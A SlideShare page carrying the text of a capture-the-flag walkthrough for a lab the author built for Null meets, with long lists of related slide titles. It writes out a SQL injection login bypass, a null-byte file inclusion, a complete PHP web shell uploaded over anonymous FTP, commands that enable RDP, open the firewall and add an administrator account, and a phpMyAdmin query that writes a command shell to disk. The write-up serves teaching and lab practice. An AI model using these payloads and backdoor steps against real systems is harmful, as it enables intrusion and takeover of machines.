SlideShare une entreprise Scribd logo

Cracking CTFs The Sysbypass CTF

Riyaz Walikar
Riyaz Walikar

A CTF I had created for the monthly Bangalore Null Meets.

Technologie
1  sur  20
Télécharger pour lire hors ligne
Cracking CTFs - Sysbypass CTF The Walkthrough Riyaz Walikar a.k.a karniv0re http://www.riyazwalikar.com This is the third Capture the Flag setup in a series of games that I wrote for the Null meets. The aim of this CTF was to read the contents of a file called flag.txt. The start address was provided to be http://192.168.56.10/. All major breakthroughs are separated into levels along with a make-shift title for each one of them. Level 1 - Bypassing Login The application landing page on http://192.168.56.10/ consisted of a login page. Since no usernames where known, an attempt was made to identify via the source code and via the error message. This did not yield any results. The page was then tested for SQL injection and was found to be vulnerable. The error message that was generated also showed the path of the application directory. The application was being run on XAMPPLite.
Using different combinations of username' or 1=1 -- still gave errors. Finally, entering admin') -- in the username field gave instant access into the application. Level 2 - Local File Inclusion The application post login bypass was a simple page with a drop down box having 4 colors as options (White, Red, Green, Blue).
When a color is selected, the page sends the name of the color via a GET request and the page background color changes. Any other string passed as the color variable results in the page color to change to white. By trial and error it was found that the application reads the <body bgcolor=green> string from files in the application directory. Four text files were found called white.txt, red.txt, green.txt and blue.txt. It was hence deduced that the application appends '.txt' to the variable passed to color via the GET request and attempts to open and read the contents of the file. If the file doesn’t exist, the application defaults to a white background. An attempt was then made to read any other files on the hard drive. Assuming the backend OS to be Windows, an attempt was made to read the C:boot.ini file.
The null byte at the end of the query string was added to terminate the string so that the OS does not read the file as boot.ini.txt (the .txt being appended by the application). Since now we could make the application open and read files we wanted, an obvious attempt was made to read a file that contained an application shell, providing command execution via GET or POST requests. The application did not contain any other pages and did not support the PUT method; hence an alternative method of uploading files had to be searched. Level 3 - FTP File Upload A quick nmap scan with version detection showed a Microsoft FTP server running on port 4242. A more intense version detection scan showed that the FTP server supported anonymous logins. Filezilla was used to connect and upload shell as shown in the screenshots below.
The default directory for Microsoft FTP is <drive>inetpubftproot where <drive> is the drive where IIS is installed. An attempt was then made to read the shell.txt file using the path ../../../../inetpub/ftproot/shell The following is the content of the shell.txt file that was uploaded. This is a simple web application backdoor that executes the command passed via the text box. There are more complex shells available on the Internet that can perform other complex functions like file upload and download, file system functions and Windows registry manipulation.
<html> <body> <br /> <form method="post"> <input type="text" name="cmd"> <input type="submit" value="Execute!"> <br /> <h2>Command Output</h2> <pre> <?php if(isset($_POST['cmd'])){ $cmd = $_POST['cmd']; if (strlen($cmd)==0){ $cmd = "true"; } system($cmd); die; } ?> </pre> </body> </html> The following screenshot shows the command input field.
OS commands can now be executed via this shell. Since the flag file was known to be flag.txt, an attrib command was run on the most common locations where the file could be found. These locations included the C:, the desktop directory of all the users on the system and the web application directory. Since the flag was not found on the file system, it was possible that hints to the flag file could exist in the database. To find the name and credentials for the database, a copy of the index.php file was made as index.txt in the same directory using copy index.php index.txt to be read via the browser. Level 4 - Discovering the DB Server It was found that the database instance was running on a different server altogether whose IP address was 192.168.56.12. A quick nmap scan showed that all requests to 192.168.56.12 were being filtered from my machine.
Since the application on 192.168.56.10 was able to communicate with the DB server on 192.168.56.12, it was evident that the application server was the only way to reach the database server.
Level 5 - Getting Remote Desktop Access to 192.168.56.10 An nmap scan earlier had already shown that the RDP port 3389 was not open, as is evident below. A quick check was performed using the Windows reg command to verify whether RDP is turned on but is being blocked by the firewall or not. In Windows Operating Systems that run Terminal Services, the DWORD value of fDenyTSConnections at HKLMSystemCurrentControlSetControlTerminal Server determines whether RDP is enabled or not. A value of 1 indicates RDP is turned off and a value of 0 turns the Remote Desktop Service on. A restart/logoff is not required in most cases to change the state of the Remote Desktop Service. The command to query the relevant key is as follows: reg query "HKLMSystemCurrentControlSetControlTerminal Server" Using the reg command, it was possible to remotely enable Remote Desktop on the server via the web shell. The command to add/edit an entry to the Windows registry, in this case the relevant Terminal Server key is as follows: reg add "HKLMSystemCurrentControlSetControlTerminal Server" /v fDenyTSConnections /d 0 /t REG_DWORD /f The above command adds/updates the fDenyTSConnections whose type is a REG_DWORD with data value 0. The /f switch is used to tell the reg command to update the entry without asking for confirmation.
After running the command, the Remote Desktop Service is enabled as evidenced by the output of another reg query. As explained before, a value of 0 for the fDenyTSConnections variable enables the Remote Desktop Service. An nmap scan was re-run to confirm whether the RDP service was visible over the network. However, nmap still showed port 3389 in filtered state.
Using the command line program, netsh.exe, it is possible to view/add/update Windows firewall rules amongst loads of other functionalities that the program offers. The following command shows the current firewall rules enabled on the server: netsh firewall show config The output clearly shows that the firewall allows connections only on port 80 and any ports opened by the inetinfo.exe executable, which is also responsible for the ftpd service that was running on port 4242.
To connect to 192.168.56.10 via RDP, it was necessary to open port 3389 on the firewall using the command line. This can also be achieved using netsh via the following command: netsh firewall set portopening TCP 3389 The netsh firewall show config output now contains the entry to allow connections on port 3389. A quick nmap scan shows the port to be open. We can then connect using mstsc and access the remote server. To login into the server via RDP, a valid user account is required which can be obtained by creating users via the web shell. The newly created user can then be added to the administrators group to be able to login into the server.
Level 6 - Creating users on 192.168.56.10 to connect via RDP The following commands can be used to check current users and create a new user and add him to the administrators group: net users net user riyaz pa55w0rd /add net localgroup administrators riyaz /add net user riyaz Once the user, riyaz here, is added to the administrator group, we can connect to the remote server via RDP using the password pa55w0rd.
Level 7 - Reaching the DB Server It is already known that the DB server would be reachable from 192.168.56.10. A command line port scanner can be uploaded via mstsc using the Local Resources sharing option. We can use Foundstone’s Scanline command line port scanner with the -bp option to get service banners and to assume the system is up. Once sl.exe is copied to 192.168.56.10, we can execute sl -bp 192.168.56.12, via RDP or the web shell, to find open ports on 192.168.56.12.
Scanline detected 2 open ports, 80 (HTTP) and 3306 (MySQL) on 192.168.56.12. The banners show more detailed output regarding the servers. Since port 80 is open, we can see what site is running using Internet Explorer on 192.168.56.12. The DB Server, 192.168.56.12 is running XAMPPLite and phpMyAdmin is publicly accessible (default configuration). A quick check on the contents of all the databases was done to see if there is any information we could use to leverage our attack, however no interesting information existed in the databases that could be used to gain system access. Level 8 - Gaining a Shell on 192.168.56.12 Using phpMyAdmin we can create a file on the server that can be used to execute commands on the server. The phpinfo() command/page available via the XAMPP home page shows the installation directory where we can attempt to create a php file using phpMyAdmin SQL Query Execution tab. The SQL query that can be used to create a php file that could execute OS commands on the DB server is as given below: select '<?php system($_GET["x"])?>' into dumpfile 'C:xampplitephpmyadmincmd.php'
This creates a file called cmd.php that allows execution of OS commands in the phpMyAdmin directory. This can be executed by accessing http://192.168.56.12/phpmyadmin/cmd.php?x=<command> from 192.168.56.10. A dir command was run on the most common locations where the file could be found. These locations included the desktop directory of all the users on the system and the C drive. The flag.txt file was found in the root of C Drive using this method.
Level 9 - Reading the flag.txt file Using the type command the contents of the C:flag.txt can be read to the screen. The CTF is completed when the string "You know what the Goa'uld really want from us? Minnesota. That's what. For the fishing mostly." is mailed to the creator of the CTF, that’s me  There are several different ways of reaching the flag.txt on the DB server. This walkthrough is just one of the most convenient and enlightening ways of doing it. Riyaz Walikar a.k.a karniv0re riyazwalikar@gmail.com http://www.riyazwalikar.com

Recommandé

Cracking CTFs - Sysbypass CTF Walkthrough
Cracking CTFs - Sysbypass CTF WalkthroughCracking CTFs - Sysbypass CTF Walkthrough
Cracking CTFs - Sysbypass CTF Walkthroughn|u - The Open Security Community
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer ProtocolOm Prakash
 
FTP - File Transfer Protocol
FTP - File Transfer ProtocolFTP - File Transfer Protocol
FTP - File Transfer ProtocolPeter R. Egli
 
Ftp hari edu
Ftp hari eduFtp hari edu
Ftp hari eduEduquity Career Technologies Pvt.Ltd.
 
Meeting 6 : ftp
Meeting 6 : ftpMeeting 6 : ftp
Meeting 6 : ftpSyaiful Ahdan
 
13 coms 525 tcpip - applications - file transfer protocol
13 coms 525 tcpip - applications - file transfer protocol13 coms 525 tcpip - applications - file transfer protocol
13 coms 525 tcpip - applications - file transfer protocolPalanivel Kuppusamy
 
File transfer protocol
File transfer protocolFile transfer protocol
File transfer protocolAmandeep Kaur
 
Ftp server
Ftp serverFtp server
Ftp serverpawnbeeta
 

Recommandé

Cracking CTFs - Sysbypass CTF Walkthrough
Cracking CTFs - Sysbypass CTF WalkthroughCracking CTFs - Sysbypass CTF Walkthrough
Cracking CTFs - Sysbypass CTF Walkthroughn|u - The Open Security Community
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer ProtocolOm Prakash
 
FTP - File Transfer Protocol
FTP - File Transfer ProtocolFTP - File Transfer Protocol
FTP - File Transfer ProtocolPeter R. Egli
 
Ftp hari edu
Ftp hari eduFtp hari edu
Ftp hari eduEduquity Career Technologies Pvt.Ltd.
 
Meeting 6 : ftp
Meeting 6 : ftpMeeting 6 : ftp
Meeting 6 : ftpSyaiful Ahdan
 
13 coms 525 tcpip - applications - file transfer protocol
13 coms 525 tcpip - applications - file transfer protocol13 coms 525 tcpip - applications - file transfer protocol
13 coms 525 tcpip - applications - file transfer protocolPalanivel Kuppusamy
 
File transfer protocol
File transfer protocolFile transfer protocol
File transfer protocolAmandeep Kaur
 
Ftp server
Ftp serverFtp server
Ftp serverpawnbeeta
 
Meeting 13. web server i
Meeting 13. web server iMeeting 13. web server i
Meeting 13. web server iSyaiful Ahdan
 
FTP
FTPFTP
FTPbhavanatmithun
 
Ftp
FtpFtp
FtpAmandeep Kaur
 
Using an FTP client - Client server computing
Using an FTP client - Client server computingUsing an FTP client - Client server computing
Using an FTP client - Client server computinglordmwesh
 
TFTP - Trivial File Transfer Protocol
TFTP - Trivial File Transfer ProtocolTFTP - Trivial File Transfer Protocol
TFTP - Trivial File Transfer ProtocolPeter R. Egli
 
File transfer protocol (ftp)
File transfer protocol (ftp)File transfer protocol (ftp)
File transfer protocol (ftp)Cort1026
 
Ftp tftp
Ftp tftpFtp tftp
Ftp tftpPrabhat gangwar
 
FTP Client and Server | Computer Science
FTP Client and Server | Computer ScienceFTP Client and Server | Computer Science
FTP Client and Server | Computer ScienceTransweb Global Inc
 
Ftp server
Ftp serverFtp server
Ftp servermadhurijaviya
 
FTP Conflict troubleshooting & MINI-LINK TN FTP
FTP Conflict troubleshooting & MINI-LINK TN FTPFTP Conflict troubleshooting & MINI-LINK TN FTP
FTP Conflict troubleshooting & MINI-LINK TN FTPMohamed Abd El Razek Bakry
 
15network Programming Clients
15network Programming Clients15network Programming Clients
15network Programming ClientsAdil Jafri
 
Ch20
Ch20Ch20
Ch20tejindershami
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer ProtocolVinh Nguyen
 
Meeting 4 DNS
Meeting 4 DNSMeeting 4 DNS
Meeting 4 DNSSyaiful Ahdan
 
(Ftp) file transfer protocol
(Ftp) file transfer protocol(Ftp) file transfer protocol
(Ftp) file transfer protocolGouasmia Zakaria
 
F T P
F T PF T P
F T Pmajidsaleemi
 
Ftp
FtpFtp
FtpARYA TM
 
Monit
MonitMonit
MonitAbhishek Singh
 
main
mainmain
mainOmar Faruk Sazib
 
CCNA 1 Chapter 10 v5.0 2014
CCNA 1 Chapter 10 v5.0 2014CCNA 1 Chapter 10 v5.0 2014
CCNA 1 Chapter 10 v5.0 2014Đồng Quốc Vương
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dumpAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 

Contenu connexe

Tendances

Meeting 13. web server i
Meeting 13. web server iMeeting 13. web server i
Meeting 13. web server iSyaiful Ahdan
 
Using an FTP client - Client server computing
Using an FTP client - Client server computingUsing an FTP client - Client server computing
Using an FTP client - Client server computinglordmwesh
 
TFTP - Trivial File Transfer Protocol
TFTP - Trivial File Transfer ProtocolTFTP - Trivial File Transfer Protocol
TFTP - Trivial File Transfer ProtocolPeter R. Egli
 
File transfer protocol (ftp)
File transfer protocol (ftp)File transfer protocol (ftp)
File transfer protocol (ftp)Cort1026
 
FTP Client and Server | Computer Science
FTP Client and Server | Computer ScienceFTP Client and Server | Computer Science
FTP Client and Server | Computer ScienceTransweb Global Inc
 
FTP Conflict troubleshooting & MINI-LINK TN FTP
FTP Conflict troubleshooting & MINI-LINK TN FTPFTP Conflict troubleshooting & MINI-LINK TN FTP
FTP Conflict troubleshooting & MINI-LINK TN FTPMohamed Abd El Razek Bakry
 
15network Programming Clients
15network Programming Clients15network Programming Clients
15network Programming ClientsAdil Jafri
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer ProtocolVinh Nguyen
 
(Ftp) file transfer protocol
(Ftp) file transfer protocol(Ftp) file transfer protocol
(Ftp) file transfer protocolGouasmia Zakaria
 

Tendances (20)

Meeting 13. web server i
Meeting 13. web server iMeeting 13. web server i
Meeting 13. web server i
 
FTP
FTPFTP
FTP
 
Ftp
FtpFtp
Ftp
 
Using an FTP client - Client server computing
Using an FTP client - Client server computingUsing an FTP client - Client server computing
Using an FTP client - Client server computing
 
TFTP - Trivial File Transfer Protocol
TFTP - Trivial File Transfer ProtocolTFTP - Trivial File Transfer Protocol
TFTP - Trivial File Transfer Protocol
 
File transfer protocol (ftp)
File transfer protocol (ftp)File transfer protocol (ftp)
File transfer protocol (ftp)
 
Ftp tftp
Ftp tftpFtp tftp
Ftp tftp
 
FTP Client and Server | Computer Science
FTP Client and Server | Computer ScienceFTP Client and Server | Computer Science
FTP Client and Server | Computer Science
 
Ftp server
Ftp serverFtp server
Ftp server
 
FTP Conflict troubleshooting & MINI-LINK TN FTP
FTP Conflict troubleshooting & MINI-LINK TN FTPFTP Conflict troubleshooting & MINI-LINK TN FTP
FTP Conflict troubleshooting & MINI-LINK TN FTP
 
15network Programming Clients
15network Programming Clients15network Programming Clients
15network Programming Clients
 
Ch20
Ch20Ch20
Ch20
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
 
Meeting 4 DNS
Meeting 4 DNSMeeting 4 DNS
Meeting 4 DNS
 
(Ftp) file transfer protocol
(Ftp) file transfer protocol(Ftp) file transfer protocol
(Ftp) file transfer protocol
 
F T P
F T PF T P
F T P
 
Ftp
FtpFtp
Ftp
 
Monit
MonitMonit
Monit
 
main
mainmain
main
 
CCNA 1 Chapter 10 v5.0 2014
CCNA 1 Chapter 10 v5.0 2014CCNA 1 Chapter 10 v5.0 2014
CCNA 1 Chapter 10 v5.0 2014
 

Similaire à Cracking CTFs The Sysbypass CTF

Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
maXbox Arduino Tutorial
maXbox Arduino TutorialmaXbox Arduino Tutorial
maXbox Arduino TutorialMax Kleiner
 
HoneyNet SOTM 32 - Windows Malware Analysis
HoneyNet SOTM 32 - Windows Malware AnalysisHoneyNet SOTM 32 - Windows Malware Analysis
HoneyNet SOTM 32 - Windows Malware AnalysisChetan Ganatra
 
Securing the tunnel with Raccoon
Securing the tunnel with RaccoonSecuring the tunnel with Raccoon
Securing the tunnel with RaccoonGloria Stoilova
 
Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windowsdkaya
 
Arduino LED maXbox starter18_3
Arduino LED maXbox starter18_3Arduino LED maXbox starter18_3
Arduino LED maXbox starter18_3Max Kleiner
 
TCP Sockets Tutor maXbox starter26
TCP Sockets Tutor maXbox starter26TCP Sockets Tutor maXbox starter26
TCP Sockets Tutor maXbox starter26Max Kleiner
 
Install websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bitsInstall websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bitsManuel Vega
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18Max Kleiner
 
Malware analysis
Malware analysisMalware analysis
Malware analysisDen Iir
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Securing Windows Remote Desktop With Copssh
Securing Windows Remote Desktop With CopsshSecuring Windows Remote Desktop With Copssh
Securing Windows Remote Desktop With CopsshCrismer La Pignola
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershellMihir Shah
 

Similaire à Cracking CTFs The Sysbypass CTF (20)

Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
 
maXbox Arduino Tutorial
maXbox Arduino TutorialmaXbox Arduino Tutorial
maXbox Arduino Tutorial
 
HoneyNet SOTM 32 - Windows Malware Analysis
HoneyNet SOTM 32 - Windows Malware AnalysisHoneyNet SOTM 32 - Windows Malware Analysis
HoneyNet SOTM 32 - Windows Malware Analysis
 
Its3 Drupal
Its3 DrupalIts3 Drupal
Its3 Drupal
 
Its3 Drupal
Its3 DrupalIts3 Drupal
Its3 Drupal
 
Securing the tunnel with Raccoon
Securing the tunnel with RaccoonSecuring the tunnel with Raccoon
Securing the tunnel with Raccoon
 
Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windows
 
Arduino LED maXbox starter18_3
Arduino LED maXbox starter18_3Arduino LED maXbox starter18_3
Arduino LED maXbox starter18_3
 
TCP Sockets Tutor maXbox starter26
TCP Sockets Tutor maXbox starter26TCP Sockets Tutor maXbox starter26
TCP Sockets Tutor maXbox starter26
 
Cita310chap09
Cita310chap09Cita310chap09
Cita310chap09
 
Install websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bitsInstall websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bits
 
linux installation.pdf
linux installation.pdflinux installation.pdf
linux installation.pdf
 
Presentación1
Presentación1Presentación1
Presentación1
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Securing Windows Remote Desktop With Copssh
Securing Windows Remote Desktop With CopsshSecuring Windows Remote Desktop With Copssh
Securing Windows Remote Desktop With Copssh
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 

Dernier

Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 

Dernier (20)

Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 

Cracking CTFs The Sysbypass CTF

  • 1. Cracking CTFs - Sysbypass CTF The Walkthrough Riyaz Walikar a.k.a karniv0re http://www.riyazwalikar.com This is the third Capture the Flag setup in a series of games that I wrote for the Null meets. The aim of this CTF was to read the contents of a file called flag.txt. The start address was provided to be http://192.168.56.10/. All major breakthroughs are separated into levels along with a make-shift title for each one of them. Level 1 - Bypassing Login The application landing page on http://192.168.56.10/ consisted of a login page. Since no usernames where known, an attempt was made to identify via the source code and via the error message. This did not yield any results. The page was then tested for SQL injection and was found to be vulnerable. The error message that was generated also showed the path of the application directory. The application was being run on XAMPPLite.
  • 2. Using different combinations of username' or 1=1 -- still gave errors. Finally, entering admin') -- in the username field gave instant access into the application. Level 2 - Local File Inclusion The application post login bypass was a simple page with a drop down box having 4 colors as options (White, Red, Green, Blue).
  • 3. When a color is selected, the page sends the name of the color via a GET request and the page background color changes. Any other string passed as the color variable results in the page color to change to white. By trial and error it was found that the application reads the <body bgcolor=green> string from files in the application directory. Four text files were found called white.txt, red.txt, green.txt and blue.txt. It was hence deduced that the application appends '.txt' to the variable passed to color via the GET request and attempts to open and read the contents of the file. If the file doesn’t exist, the application defaults to a white background. An attempt was then made to read any other files on the hard drive. Assuming the backend OS to be Windows, an attempt was made to read the C:boot.ini file.
